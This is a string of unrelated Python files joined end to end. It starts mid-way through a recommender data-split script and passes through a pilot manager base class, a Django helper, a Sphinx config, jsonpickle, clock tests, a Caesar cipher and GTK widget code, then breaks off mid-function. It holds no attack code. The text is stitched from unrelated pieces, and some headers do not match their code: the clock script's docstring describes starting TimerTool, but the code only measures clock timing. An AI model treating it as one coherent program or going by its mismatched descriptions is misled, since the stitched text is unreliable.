print('Full train set\n\tEvents: {}\n\tSessions: {}\n\tItems: {}'.format(len(train), train.SessionId.nunique(), train.ItemId.nunique()))
train.to_csv(PATH_TO_PROCESSED_DATA + 'rsc15_train_full.txt', sep='\t', index=False)
print('Test set\n\tEvents: {}\n\tSessions: {}\n\tItems: {}'.format(len(test), test.SessionId.nunique(), test.ItemId.nunique()))
test.to_csv(PATH_TO_PROCESSED_DATA + 'rsc15_test.txt', sep='\t', index=False)

# Repeat the same last-day split inside the training set to carve out a
# validation set for hyper-parameter tuning.
tmax = train.Time.max()
session_max_times = train.groupby('SessionId').Time.max()
session_train = session_max_times[session_max_times < tmax-86400].index
session_valid = session_max_times[session_max_times >= tmax-86400].index
train_tr = train[np.in1d(train.SessionId, session_train)]
valid = train[np.in1d(train.SessionId, session_valid)]
valid = valid[np.in1d(valid.ItemId, train_tr.ItemId)]
tslength = valid.groupby('SessionId').size()
valid = valid[np.in1d(valid.SessionId, tslength[tslength>=2].index)]
print('Train set\n\tEvents: {}\n\tSessions: {}\n\tItems: {}'.format(len(train_tr), train_tr.SessionId.nunique(), train_tr.ItemId.nunique()))
train_tr.to_csv(PATH_TO_PROCESSED_DATA + 'rsc15_train_tr.txt', sep='\t', index=False)
print('Validation set\n\tEvents: {}\n\tSessions: {}\n\tItems: {}'.format(len(valid), valid.SessionId.nunique(), valid.ItemId.nunique()))
valid.to_csv(PATH_TO_PROCESSED_DATA + 'rsc15_train_valid.txt', sep='\t', index=False)


from attributes import *
from constants  import *


# ------------------------------------------------------------------------------
#
class UnitManager (Attributes) :
    """
    UnitManager class -- manages a pool of (Compute or Data) pilots and the
    units scheduled onto them.

    Every operational method on this base class is abstract: concrete
    implementations are expected to override them.  Calling one here raises
    an Exception naming the missing implementation.
    """


    # --------------------------------------------------------------------------
    #
    def __init__ (self, url=None, scheduler='default', session=None) :
        """
        Create a unit manager.

        :param url:       backend endpoint (unused by the base class).
        :param scheduler: name of the scheduling policy to apply.
        :param session:   session to attach to (unused by the base class).
        """

        Attributes.__init__ (self)


    # --------------------------------------------------------------------------
    #
    def add_pilot (self, pid) :
        """
        add (Compute or Data)-Pilot(s) to the pool
        """

        raise Exception ("%s.add_pilot() is not implemented" % self.__class__.__name__)


    # --------------------------------------------------------------------------
    #
    def list_pilots (self, ptype=ANY) :
        """
        List IDs of data and/or compute pilots
        """

        raise Exception ("%s.list_pilots() is not implemented" % self.__class__.__name__)


    # --------------------------------------------------------------------------
    #
    def remove_pilot (self, pid, drain=False) :
        """
        Remove pilot(s) (does not cancel the pilot(s), but removes all units
        from the pilot(s).

        `drain` determines what happens to the units which are managed by the
        removed pilot(s).  If `True`, the pilot removal is delayed until all
        units reach a final state.  If `False` (the default), then `RUNNING`
        units will be canceled, and `PENDING` units will be re-assigned to the
        unit managers for re-scheduling to other pilots.
        """

        raise Exception ("%s.remove_pilot() is not implemented" % self.__class__.__name__)


    # --------------------------------------------------------------------------
    #
    def submit_unit (self, description) :
        """
        Instantiate and return (Compute or Data)-Unit object(s)
        """

        raise Exception ("%s.submit_unit() is not implemented" % self.__class__.__name__)


    # --------------------------------------------------------------------------
    #
    def list_units (self, utype=ANY) :
        """
        List IDs of data and/or compute units
        """

        raise Exception ("%s.list_units() is not implemented" % self.__class__.__name__)


    # --------------------------------------------------------------------------
    #
    def get_unit (self, uids) :
        """
        Reconnect to and return (Compute or Data)-Unit object(s)
        """

        raise Exception ("%s.get_unit() is not implemented" % self.__class__.__name__)


    # --------------------------------------------------------------------------
    #
    # NOTE: the list default is shared across calls, but it is never mutated
    # here, so it is safe; kept as-is for interface compatibility.
    def wait_unit (self, uids, state=[DONE, FAILED, CANCELED], timeout=-1.0) :
        """
        Wait for given unit(s) to enter given state
        """

        raise Exception ("%s.wait_unit() is not implemented" % self.__class__.__name__)


    # --------------------------------------------------------------------------
    #
    def cancel_units (self, uids) :
        """
        Cancel given unit(s)
        """

        # Fixed: the message previously named 'cancel_unit', which does not
        # match this method's actual name.
        raise Exception ("%s.cancel_units() is not implemented" % self.__class__.__name__)


# ------------------------------------------------------------------------------
#



import datetime

from django.contrib.contenttypes.models import ContentType
from django.utils import timezone

from .models import Action


def create_action(user, verb, target=None):
    """Record ``user`` performing ``verb`` (optionally on ``target``), unless
    an identical action was already recorded within the last minute.

    :param user:   the acting user (its ``id`` is used for the lookup).
    :param verb:   short description of the action performed.
    :param target: optional model instance the action applies to.
    :returns: True when a new Action row was saved, False when a recent
        duplicate was found and nothing was written.
    """
    now = timezone.now()
    last_minute = now - datetime.timedelta(seconds=60)
    # Candidate duplicates: same user and verb within the last 60 seconds.
    similar_actions = Action.objects.filter(user_id=user.id, verb=verb, created__gte=last_minute)

    if target:
        target_ct = ContentType.objects.get_for_model(target)
        # BUG FIX: narrow the existing queryset instead of starting a fresh
        # one -- the original rebuilt the query from Action.objects here,
        # silently dropping the user/verb/last-minute constraints, so any
        # recent action on the same target (by anyone, ever since) would
        # suppress saving.
        similar_actions = similar_actions.filter(target_ct=target_ct, target_id=target.id)

    if not similar_actions:
        action = Action(user=user, verb=verb, target=target)
        action.save()
        return True
    return False

# -*- coding: utf-8 -*-
#
# RedPipe documentation build configuration file, created by
# sphinx-quickstart on Wed Apr 19 13:22:45 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.

# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))


# -- General configuration ------------------------------------------------

# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'

# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
import os
import sys
from os import path

# Repository root (one level above this docs directory); prepended to sys.path
# so the in-tree ``redpipe`` package is importable without being installed.
ROOTDIR = path.abspath(os.path.dirname(os.path.dirname(__file__)))

sys.path.insert(0, ROOTDIR)

import redpipe  # noqa

extensions = [
    'alabaster',
    'sphinx.ext.autodoc',
    'sphinx.ext.intersphinx',
    'sphinx.ext.viewcode',
    'sphinx.ext.napoleon',
]

# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']

# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'

# The master toctree document.
master_doc = 'index'

# General information about the project.
project = u'RedPipe'
copyright = u'2017, John Loehrer'
author = u'John Loehrer'

# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# Both are taken from the package itself so the docs can never drift from the
# released version string.
#
# The short X.Y version.
version = redpipe.__version__

# The full version, including alpha/beta/rc tags.
release = redpipe.__version__

# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None

# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']

# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'

# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False


# -- Options for HTML output ----------------------------------------------

# The theme to use for HTML and HTML Help pages.  See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'

# Theme options are theme-specific and customize the look and feel of a theme
# further.  For a list of options available for each theme, see the
# documentation.
#
html_theme_options = {
    'logo': 'redpipe-logo.gif',
    'github_banner': True,
    'github_user': '72squared',
    'github_repo': 'redpipe',
    'travis_button': True,
    'analytics_id': 'UA-98626018-1',
}

html_sidebars = {
    '**': [
        'about.html',
        'navigation.html',
        'relations.html',
        'searchbox.html',
    ]
}


# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']


# -- Options for HTMLHelp output ------------------------------------------

# Output file base name for HTML help builder.
htmlhelp_basename = 'RedPipedoc'


# -- Options for LaTeX output ---------------------------------------------

latex_elements = {
    # The paper size ('letterpaper' or 'a4paper').
    #
    # 'papersize': 'letterpaper',

    # The font size ('10pt', '11pt' or '12pt').
    #
    # 'pointsize': '10pt',

    # Additional stuff for the LaTeX preamble.
    #
    # 'preamble': '',

    # Latex figure (float) alignment
    #
    # 'figure_align': 'htbp',
}

# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
#  author, documentclass [howto, manual, or own class]).
latex_documents = [
    (master_doc, 'RedPipe.tex', u'%s Documentation' % project,
     u'John Loehrer', 'manual'),
]


# -- Options for manual page output ---------------------------------------

# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
    (master_doc, project, u'%s Documentation' % project,
     [author], 1)
]


# -- Options for Texinfo output -------------------------------------------

# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
#  dir menu entry, description, category)
texinfo_documents = [
    (master_doc, project, u'%s Documentation' % project,
     author, project, 'making redis pipelines easy in python',
     'Miscellaneous'),
]

# Silence warnings about images hosted on external URLs (e.g. badges).
suppress_warnings = ['image.nonlocal_uri']

from src.tools.dictionaries import PostLoadedDict

# Utility class
################################################
class ServerImplementationDict(PostLoadedDict):
    """PostLoadedDict variant whose missing keys resolve to ``NotImplemented``
    instead of raising KeyError."""
    def __missing__(self, key):
        # Give the parent a chance to resolve the key first; only when it
        # still raises KeyError do we fall back to the sentinel.
        try:
            value = super().__missing__(key)
        except KeyError:
            return NotImplemented
        return value
################################################



class Server():
    """Lazy facade over a server implementation loaded on demand.

    ``loader`` must produce a dictionary (or an appropriate iterable)
    with the required keys.  Loading is deferred so that code for
    servers that are never used is never imported; this also prevents
    import-loop collisions.
    """

    def __init__(self, shortname, loader):
        # NOTE: the original declared ``global __ServerImplementationDict``
        # here; that name is never assigned anywhere, so the declaration
        # was a no-op and has been removed.
        self.__data = ServerImplementationDict(loader)
        self.__shortname = shortname

    @property
    def shortname(self):
        # This is the only property provided from above (not from the
        # loader's data).
        return self.__shortname

    def __str__(self):
        return str(self.__shortname)

    # All other properties must come from canonical sources
    # provided by the server loader.

    # CONSTANTS (STRINGS, BOOLEANS, INTS, ETC.)

    @property
    def name(self):
        return self.__data['str_name']

    @property
    def internal_shortname(self):
        return self.__data['str_shortname']

    @property
    def beta(self):
        return self.__data['bool_tester']

    # CLASSES

    # 1- Credentials:

    @property
    def Auth(self):
        # Credential/authentication class exposed by the server module.
        return self.__data['cls_auth']

    @property
    def auth_fields(self):
        return self.__data['list_authkeys']

    # 2- Server Elements:

    @property
    def Player(self):
        return self.__data['cls_player']

    @property
    def Tournament(self):
        return self.__data['cls_tournament']
# -*- coding: utf-8 -*-
#
# Copyright (C) 2008 John Paulett (john -at- paulett.org)
# Copyright (C) 2009, 2011, 2013 David Aguilar (davvid -at- gmail.com)
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution.

"""Python library for serializing any arbitrary object graph into JSON.

jsonpickle can take almost any Python object and turn the object into JSON.
Additionally, it can reconstitute the object back into Python.

The object must be accessible globally via a module and must
inherit from object (AKA new-style classes).

Create an object::

    class Thing(object):
        def __init__(self, name):
            self.name = name

    obj = Thing('Awesome')

Use jsonpickle to transform the object into a JSON string::

    import jsonpickle
    frozen = jsonpickle.encode(obj)

Use jsonpickle to recreate a Python object from a JSON string::

    thawed = jsonpickle.decode(frozen)

.. warning::

    Loading a JSON string from an untrusted source represents a potential
    security vulnerability.  jsonpickle makes no attempt to sanitize the input.

The new object has the same type and data, but essentially is now a copy of
the original.

.. code-block:: python

    assert obj.name == thawed.name

If you will never need to load (regenerate the Python class from JSON), you can
pass in the keyword unpicklable=False to prevent extra information from being
added to JSON::

    oneway = jsonpickle.encode(obj, unpicklable=False)
    result = jsonpickle.decode(oneway)
    assert obj.name == result['name'] == 'Awesome'

"""
import sys, os
from music21 import common
# Make the jsonpickle copy shipped under music21's 'ext' directory
# importable (presumably a vendored copy -- confirm against repo layout).
sys.path.append(common.getSourceFilePath() + os.path.sep + 'ext')


from jsonpickle import pickler
from jsonpickle import unpickler
from jsonpickle.backend import JSONBackend
from jsonpickle.version import VERSION

# ensure built-in handlers are loaded
__import__('jsonpickle.handlers')

__all__ = ('encode', 'decode')
__version__ = VERSION

# Module-wide default backend, used when encode()/decode() receive
# backend=None.
json = JSONBackend()

# Export specific JSONPluginMgr methods into the jsonpickle namespace
set_preferred_backend = json.set_preferred_backend
set_encoder_options = json.set_encoder_options
load_backend = json.load_backend
remove_backend = json.remove_backend
enable_fallthrough = json.enable_fallthrough

def encode(value,
           unpicklable=True,
           make_refs=True,
           keys=False,
           max_depth=None,
           backend=None,
           warn=False,
           max_iter=None):
    """Return a JSON formatted representation of value, a Python object.

    :param unpicklable: If set to False then the output will not contain the
        information necessary to turn the JSON data back into Python objects,
        but a simpler JSON stream is produced.
    :param max_depth: If set to a non-negative integer then jsonpickle will
        not recurse deeper than 'max_depth' steps into the object.  Anything
        deeper than 'max_depth' is represented using a Python repr() of the
        object.
    :param make_refs: If set to False jsonpickle's referencing support is
        disabled.  Objects that are id()-identical won't be preserved across
        encode()/decode(), but the resulting JSON stream will be conceptually
        simpler.  jsonpickle detects cyclical objects and will break the cycle
        by calling repr() instead of recursing when make_refs is set False.
    :param keys: If set to True then jsonpickle will encode non-string
        dictionary keys instead of coercing them into strings via `repr()`.
    :param warn: If set to True then jsonpickle will warn when it
        returns None for an object which it cannot pickle
        (e.g. file descriptors).
    :param max_iter: If set to a non-negative integer then jsonpickle will
        consume at most `max_iter` items when pickling iterators.

    >>> encode('my string')
    '"my string"'
    >>> encode(36)
    '36'

    >>> encode({'foo': True})
    '{"foo": true}'

    >>> encode({'foo': True}, max_depth=0)
    '"{\\'foo\\': True}"'

    >>> encode({'foo': True}, max_depth=1)
    '{"foo": "True"}'


    """
    if backend is None:
        backend = json
    return pickler.encode(value,
                          backend=backend,
                          unpicklable=unpicklable,
                          make_refs=make_refs,
                          keys=keys,
                          max_depth=max_depth,
                          warn=warn,
                          # Bug fix: max_iter was accepted and documented
                          # above but never forwarded, so iterator
                          # truncation silently never happened.
                          max_iter=max_iter)


def decode(string, backend=None, keys=False):
    """Convert a JSON string into a Python object.

    The keyword argument 'keys' defaults to False.
    If set to True then jsonpickle will decode non-string dictionary keys
    into python objects via the jsonpickle protocol.

    >>> str(decode('"my string"'))
    'my string'
    >>> decode('36')
    36
    """
    # Fall back to the module-wide backend when none was supplied.
    chosen_backend = json if backend is None else backend
    return unpickler.decode(string, backend=chosen_backend, keys=keys)


# json.load(),loads(), dump(), dumps() compatibility
# (module-level aliases so callers can use the stdlib-json naming)
dumps = encode
loads = decode

# -*- coding: utf-8 -*-
"""
Created on Wed Sep 09 13:04:53 2015

* If TimerTool.exe is running, kill the process.
* If input parameter is given, start TimerTool and set clock resolution
Starts TimerTool.exe and sets the clock resolution to argv[0] ms

Ex: python set_clock_resolution 0.5
@author: marcus
"""

import time, datetime
from socket import gethostname, gethostbyname
import os
import numpy as np

def main():
    """Measure the resolution of three Python clocks and log the stats.

    Samples time.clock(), time.time() and datetime.now() 100 times at
    ~1 ms intervals, then writes mean/median/std of the inter-sample
    deltas (in ms) to a timestamped text file in C:\\Share\\sync_clocks.

    NOTE(review): time.clock() was removed in Python 3.8; this script
    presumably targets Python 2 -- confirm before porting further.
    """
    my_path = os.path.join('C:',os.sep,'Share','sync_clocks')
    os.chdir(my_path)

    # Initial timestamps
    t1 = time.clock()
    t2 = time.time()
    t3 = datetime.datetime.now()

    td1 = []
    td2 = []
    td3 = []
    # range() instead of py2-only xrange(): identical behavior here and
    # avoids a NameError on Python 3.
    for i in range(100):
        td1.append(time.clock()-t1)
        td2.append(time.time() -t2)
        td3.append((datetime.datetime.now()-t3).total_seconds())
        time.sleep(0.001)

    # Create text file (named after host IP suffix + timestamp) and
    # write header; 'with' guarantees the file is closed even on error.
    t = datetime.datetime.now()
    ip = gethostbyname(gethostname()).split('.')[-1]
    f_name = '_'.join([ip,'test_clock_res',str(t.year),str(t.month),str(t.day),
                       str(t.hour),str(t.minute),str(t.second)])
    with open(f_name+'.txt','w') as f:
        f.write('%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\t%s\n'    %
                ('mean_clock','median_clock','sd_clock',
                 'mean_time','median_time','sd_time',
                 'mean_datetime','median_datetime','sd_datetime',))

        # Write results to text file (deltas converted to milliseconds)
        f.write('%.2f\t%.2f\t%.2f\t%.2f\t%.2f\t%.2f\t%.2f\t%.2f\t%.2f\n' %
                (np.mean(np.diff(td1))*1000, np.median(np.diff(td1))*1000,np.std(np.diff(td1))*1000,
                 np.mean(np.diff(td2))*1000, np.median(np.diff(td2))*1000,np.std(np.diff(td2))*1000,
                 np.mean(np.diff(td3))*1000, np.median(np.diff(td3))*1000,np.std(np.diff(td3))*1000))

if __name__ == "__main__":
    main()
# Block-level HTML elements around which user-inserted line breaks must
# be removed before Markdown/HTML output.
blocklevel = ["blockquote", "div", "form", "p", "table", "video", "h1", "h2", "h3", "h4", "h5", "h6", "hr", "details", "article", "header", "main"]
def normalizeEnter(src):
	"""Delete carriage returns adjacent to block-level tags in *src*.

	The user adds line breaks for readability, but they break the HTML
	output.  while-loops are kept (a plain replace() is not enough)
	because one replacement can uncover a new match, e.g. a doubled
	carriage return before "<div".
	"""
	for elem in blocklevel:
		while "\r<" + elem in src:
			src = src.replace("\r<" + elem, "<" + elem)
		while "</" + elem + ">\r" in src:
			src = src.replace("</" + elem + ">\r", "</" + elem + ">")
	# These two patterns do not depend on the tag name, so they run once
	# after the loop; the original ran them inside the loop, repeating
	# identical work once per element for the same result.
	while ">\r" in src:
		src = src.replace(">\r", ">")
	while "\r</" in src:
		src = src.replace("\r</", "</")
	return src
def main(islinput, inputfile, pluginData, globalData):
	"""Normalize line breaks in every input item, updating the list in place."""
	for index, item in enumerate(islinput):
		islinput[index] = normalizeEnter(item)
	return islinput, pluginData, globalData

import cairo

from gi.repository import Gtk
from gi.repository import Gdk

from pylsner import plugin


class Window(Gtk.Window):
    """Transparent, full-screen overlay window hosting Pylsner widgets."""

    def __init__(self):
        super(Window, self).__init__(skip_pager_hint=True,
                                     skip_taskbar_hint=True,
                                    )
        self.set_title('Pylsner')

        # Fill the entire screen.
        screen = self.get_screen()
        self.width = screen.get_width()
        self.height = screen.get_height()
        self.set_size_request(self.width, self.height)
        self.set_position(Gtk.WindowPosition.CENTER)
        # RGBA visual + fully transparent background so only the drawn
        # widgets are visible.
        rgba = screen.get_rgba_visual()
        self.set_visual(rgba)
        self.override_background_color(Gtk.StateFlags.NORMAL,
                                       Gdk.RGBA(0, 0, 0, 0),
                                      )

        # Dock-like behavior: present on all workspaces, kept below
        # normal windows.
        self.set_wmclass('pylsner', 'pylsner')
        self.set_type_hint(Gdk.WindowTypeHint.DOCK)
        self.stick()
        self.set_keep_below(True)

        drawing_area = Gtk.DrawingArea()
        drawing_area.connect('draw', self.redraw)
        # Tick counter driving per-widget refresh rates; see refresh().
        self.refresh_cnt = 0
        self.add(drawing_area)

        self.connect('destroy', lambda q: Gtk.main_quit())

        # Widget instances to refresh/draw; populated by the caller.
        self.widgets = []

        self.show_all()

    def refresh(self, force=False):
        """Advance the tick counter and refresh due widgets; always True.

        A widget is refreshed when the counter is a multiple of its
        metric's refresh_rate, or when *force* is set.  Returning True
        presumably keeps a repeating GLib timeout scheduled -- confirm
        against the caller.
        """
        self.refresh_cnt += 1
        # Wrap to keep the counter bounded.
        if self.refresh_cnt >= 60000:
            self.refresh_cnt = 0
        redraw_required = False
        for wid in self.widgets:
            if (self.refresh_cnt % wid.metric.refresh_rate == 0) or force:
                wid.refresh()
                redraw_required = True
        if redraw_required:
            self.queue_draw()
        return True

    def redraw(self, _, ctx):
        """'draw' signal handler: render every widget onto cairo context *ctx*."""
        ctx.set_antialias(cairo.ANTIALIAS_SUBPIXEL)
        for wid in self.widgets:
            wid.redraw(ctx)

class Widget:
    """A single on-screen gauge assembled from three plugins:
    a metric (data source), an indicator (shape) and a fill (color)."""

    def __init__(self,
                 name='default',
                 metric=None,
                 indicator=None,
                 fill=None,
                ):
        """Load the three plugins from their config dicts.

        Each config dict must contain a 'plugin' key naming the plugin;
        the whole dict is passed to the plugin constructor as kwargs.
        Defaults are applied inside the body: dict literals as default
        argument values would be shared across every Widget instance
        (the mutable-default-argument pitfall).
        """
        if metric is None:
            metric = {'plugin': 'time'}
        if indicator is None:
            indicator = {'plugin': 'arc'}
        if fill is None:
            fill = {'plugin': 'rgba_255'}
        self.name = name
        MetricPlugin = plugin.load_plugin('metrics', metric['plugin'])
        self.metric = MetricPlugin(**metric)
        IndicatorPlugin = plugin.load_plugin('indicators', indicator['plugin'])
        self.indicator = IndicatorPlugin(**indicator)
        FillPlugin = plugin.load_plugin('fills', fill['plugin'])
        self.fill = FillPlugin(**fill)

    def refresh(self):
        """Poll the metric, then update the fill from the new value."""
        self.metric.refresh()
        self.fill.refresh(self.metric.value)

    def redraw(self, ctx):
        """Draw the indicator onto *ctx* using the current fill pattern."""
        ctx.set_source(self.fill.pattern)
        self.indicator.redraw(ctx, self.metric.value)

# Given the list values = [] , write code that fills the list with each set of numbers below.
# a.1     2   3   4   5   6   7   8   9   10

# Use 'values' as the exercise states (avoids shadowing the builtin
# 'list'), and start the range at 1: range(11) would also include 0,
# which is not in the requested set.
values = []

for number in range(1, 11):
    values.append(number)

print(values)
"""
Tests for L{monotone}.
"""
from hypothesis import given, strategies as st
import errno

from monotone import get_clock_info, monotonic
from monotone import _api, _bindings

import os

import platform

import pytest

# Skip marker for tests exercising the POSIX clock_gettime(3) backend.
# NOTE(review): the condition skips only when (posix AND Darwin), i.e. it
# skips on macOS but does NOT skip on non-POSIX platforms -- confirm that
# is intended.
needs_posix = pytest.mark.skipif(
    os.name == "posix" and platform.system() == "Darwin",
    reason="POSIX-only tests (clock_gettime(3))",
)
# Skip marker for tests exercising the macOS mach_absolute_time(3) backend.
needs_macos = pytest.mark.skipif(
    platform.system() != "Darwin",
    reason="macOS-only tests (mach_absolute_time(3))",
)


@pytest.fixture
def errno_value():
    """
    The errno used by the failure-injection fixtures (EINVAL, chosen
    arbitrarily).
    """
    chosen = errno.EINVAL
    return chosen


@pytest.fixture
def strerror(errno_value):
    """
    The string representation of a particular errno
    """
    # %d formatting produces the same text as str.format for an int.
    return "[Errno %d] Invalid argument" % errno_value


@pytest.fixture
def apply_failing_clock_call(monkeypatch):
    """
    Return a callable that patches in a failing system call fake that
    fails and return a list of calls to that fake.
    """

    def _apply_failing_clock_call(name, errno_value):
        # Record of (clock_id, timespec) argument pairs seen by the fake.
        calls = []

        def _failing_clock_call(clock_id, timespec):
            calls.append((clock_id, timespec))
            # Bug fix: set the *requested* errno rather than a hard-coded
            # errno.EINVAL.  The errno_value parameter was previously
            # ignored (masked because the errno_value fixture is also
            # EINVAL).
            monkeypatch.setattr(_api.ffi, "errno", errno_value)
            return -1

        monkeypatch.setattr(_api, name, _failing_clock_call)

        return calls

    return _apply_failing_clock_call


@pytest.fixture
def apply_timespec(monkeypatch):
    """
    Return a callable that patches in a fake over the specified clock
    call that sets the specified resolution and returns a list of
    calls to that fake.
    """

    def _apply_timespec(name, goal_timespec):
        # Record of (clock_id, timespec) argument pairs seen by the fake.
        calls = []

        def _fake_clock_call(clock_id, timespec):
            calls.append((clock_id, timespec))
            # Copy the desired timespec into the caller's out-parameter,
            # then report success (0) like the real syscall would.
            timespec[0] = goal_timespec[0]
            return 0

        monkeypatch.setattr(_api, name, _fake_clock_call)

        return calls

    return _apply_timespec


class TestSimpleNamespace(object):
    """
    Tests for L{_SimpleNamespace}.
    """

    def test_init(self):
        """
        Keyword arguments passed to the initializer end up as instance
        attributes.
        """
        assert _api._SimpleNamespace(x=1).x == 1

    def test_repr(self):
        """
        The instance's repr reflects its C{__dict__}
        """
        ns = _api._SimpleNamespace()
        ns.y = 2
        assert repr(ns) == "namespace(y=2)"

    def test_eq(self):
        """
        Two instances with equal C{__dict__}s are equal.
        """
        left = _api._SimpleNamespace(a=1)
        right = _api._SimpleNamespace(a=1)
        assert left == right


@needs_posix
class TestGetClockInfoPosix(object):

    """
    Tests for L{get_clock_info}.
    """

    def test_non_monotonic(self):
        """
        L{get_clock_info} only knows about the monotonic clock.
        """
        with pytest.raises(ValueError):
            get_clock_info("not monotonic")

    def test_failure(self, apply_failing_clock_call, errno_value, strerror):
        """
        A failure in C{clock_getres} results in an L{OSError} that
        presents the failure's errno.
        """
        calls = apply_failing_clock_call('_clock_getres', errno_value)

        with pytest.raises(OSError) as exc:
            get_clock_info("monotonic")

        # The fake must have been consulted exactly once, for the
        # monotonic clock.
        assert len(calls) == 1
        assert calls[0][0] == _bindings.lib.CLOCK_MONOTONIC

        assert str(exc.value) == strerror

    @given(
        clock_getres_spec=st.fixed_dictionaries({
            "tv_sec": st.sampled_from([0, 1]),
            "tv_nsec": st.sampled_from([0, 1]),

        }),
    )
    def test_info(self, clock_getres_spec, apply_timespec):
        """
        The reported info always includes a nanosecond resolution when
        C{clock_getres} indicates nanosecond resolution.
        """
        calls = apply_timespec(
            "_clock_getres",
            _bindings.ffi.new("struct timespec *", clock_getres_spec),
        )

        expected_info = _api._SimpleNamespace(
            adjustable=False,
            implementation="clock_gettime(MONOTONIC)",
            monotonic=True,
            resolution=None,    # checked separately
        )

        # A non-zero tv_nsec means nanosecond resolution; otherwise the
        # resolution is a whole second.
        if clock_getres_spec['tv_nsec']:
            expected_resolution = 1e-09
        else:
            expected_resolution = 1.0

        info = get_clock_info("monotonic")
        # Detach the float resolution so the namespaces compare equal.
        resolution, info.resolution = info.resolution, None

        assert info == expected_info
        assert resolution - expected_resolution == pytest.approx(0.0)

        assert len(calls) == 1
        assert calls[0][0] == _bindings.lib.CLOCK_MONOTONIC


@needs_macos
class TestGetClockInfoMacOS(object):
    """
    Tests for L{get_clock_info}.
    """

    def test_non_monotonic(self):
        """
        L{get_clock_info} only knows about the monotonic clock.
        """
        with pytest.raises(ValueError):
            get_clock_info("not monotonic")

    def test_info(self):
        """
        The reported info always includes a nanosecond resolution.
        """

        expected_info = _api._SimpleNamespace(
            adjustable=False,
            implementation="mach_absolute_time()",
            monotonic=True,
            resolution=None,    # checked separately
        )

        # The mach_absolute_time() backend always reports nanoseconds.
        expected_resolution = 1e-09

        info = get_clock_info("monotonic")
        # Detach the float resolution so the namespaces compare equal.
        resolution, info.resolution = info.resolution, None

        assert info == expected_info
        assert resolution - expected_resolution == pytest.approx(0.0)


@needs_posix
def test_monotonic_fails_posix(apply_failing_clock_call,
                               errno_value,
                               strerror):
    """
    A failure in C{clock_gettime} results in an L{OSError} that
    presents the failure's errno.
    """
    calls = apply_failing_clock_call('_clock_gettime', errno_value)

    with pytest.raises(OSError) as exc:
        monotonic()

    # Exactly one syscall attempt, against the monotonic clock.
    assert len(calls) == 1
    assert calls[0][0] == _bindings.lib.CLOCK_MONOTONIC

    assert str(exc.value) == strerror


@needs_posix
@given(
    clock_gettime_spec=st.fixed_dictionaries({
        "tv_sec": st.integers(min_value=0, max_value=2 ** 32 - 1),
        "tv_nsec": st.integers(min_value=0, max_value=2 ** 32 - 1),

    }),
)
def test_clock(clock_gettime_spec, apply_timespec):
    """
    For any given time resolution, the monotonic time equals the
    sum of the seconds and nanoseconds.
    """
    clock_gettime_calls = apply_timespec(
        '_clock_gettime',
        _bindings.ffi.new("struct timespec *", clock_gettime_spec),
    )

    # We expect a float: the seconds plus the nanoseconds scaled down
    # by a billion.
    expected = float(clock_gettime_spec['tv_sec']) + (
        clock_gettime_spec['tv_nsec'] * 1e-09)

    result = monotonic()

    assert result - expected == pytest.approx(0.0)

    assert clock_gettime_calls[0][0] == _bindings.lib.CLOCK_MONOTONIC


def test_clock_increases():
    """
    A monotonic moment is never greater than a succeeding monotonic
    moment.
    """
    earlier = monotonic()
    later = monotonic()
    assert earlier <= later

"""
http://community.topcoder.com/stat?c=problem_statement&pm=1667

Single Round Match 147 Round 1 - Division II, Level One
"""


class CCipher:
    """Caesar-cipher decoder for uppercase A-Z cipher text."""

    def decode(self, cipherText, shift):
        """Shift every letter of *cipherText* back by *shift* positions,
        wrapping around the 26-letter alphabet."""
        base = ord('A')
        letters = []
        for ch in cipherText:
            offset = ord(ch) - base - shift
            if offset < 0:
                # Wrap around past 'A'.
                offset += 26
            letters.append(chr(base + offset))
        return ''.join(letters)

from hwt.synthesizer.rtlLevel.extract_part_drivers import extract_part_drivers
from hwt.synthesizer.rtlLevel.remove_unconnected_signals import removeUnconnectedSignals
from hwt.synthesizer.rtlLevel.mark_visibility_of_signals_and_check_drivers import markVisibilityOfSignalsAndCheckDrivers


class DummyPlatform():
    """
    Minimal platform object holding lists of netlist-processing callbacks.

    :note: all processors have to be callable with only one parameter
        which is actual Unit/RtlNetlist instance
    """

    def __init__(self):
        # Hooks around the to-RTL translation phases; empty by default.
        self.beforeToRtl = []
        self.beforeToRtlImpl = []
        self.afterToRtlImpl = []

        # Standard clean-up passes run before HDL architecture generation.
        self.beforeHdlArchGeneration = [
            extract_part_drivers,
            removeUnconnectedSignals,
            markVisibilityOfSignalsAndCheckDrivers,
        ]
        self.afterToRtl = []

from __future__ import (absolute_import, division, print_function,
                        unicode_literals)

RJUST = 12  # field width used to right-justify every prefix label


# The functions below are thin wrappers around format_line(); each one
# only fixes the prefix label for a particular kind of reading.

def format_fans(fans):
    return format_line(prefix='fans'.rjust(RJUST), values=fans)


def format_rpms(rpms):
    return format_line(prefix='rpms'.rjust(RJUST), values=rpms)


def format_pwms(pwms):
